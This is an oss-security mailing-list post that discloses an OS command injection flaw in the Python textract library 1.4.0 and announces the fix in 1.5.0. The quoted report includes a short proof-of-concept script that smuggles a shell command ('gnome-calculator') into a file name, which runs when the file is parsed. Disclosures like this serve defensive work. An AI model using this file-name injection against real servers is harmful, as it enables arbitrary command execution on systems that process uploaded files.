Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Date: Thu, 17 Nov 2016 09:18:26 -0500
From: Pierre Ernst <pernst@...esforce.com>
To: oss-security@...ts.openwall.com
Subject: Re: CVE request - textract 1.4.0 - OS Command Injection

Version 1.5.0 includes a fix for this

https://github.com/deanmalmgren/textract/releases/tag/v1.5.0


On Thu, Oct 20, 2016 at 5:40 PM, Pierre Ernst <pernst@...esforce.com> wrote:

> The Python textract component (https://github.com/
> deanmalmgren/textract/tree/v1.4.0) is vulnerable to OS command injection.
>
> this fork contains a fix:
> https://github.com/pierre-ernst/textract
>
>
> Parsing a file with a malicious name leads to arbitrary OS command
> injection, this is especially risky when parsing user-supplied files on a
> server (e.g. uploaded files)
>
> PoC:
>
> import textract
> import sys
> import os
>
> # create a file with a malicious name and arbitrary content
> fileName = './test";gnome-calculator;#.pdf'
> file = open(fileName,'w+')
> file.write('Pierre Ernst, Salesforce')
> file.close()
>
> # parse newly created file
> text = textract.process(fileName)
> print text
>
> # cleanup
> os.remove(fileName);
>
>
> --
> Pierre Ernst
> Salesforce
>
>


-- 
Pierre Ernst
Senior Application Security Engineer
M&A Security
Salesforce.com
mobile: +1 613-404-1450
timezone: EDT

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ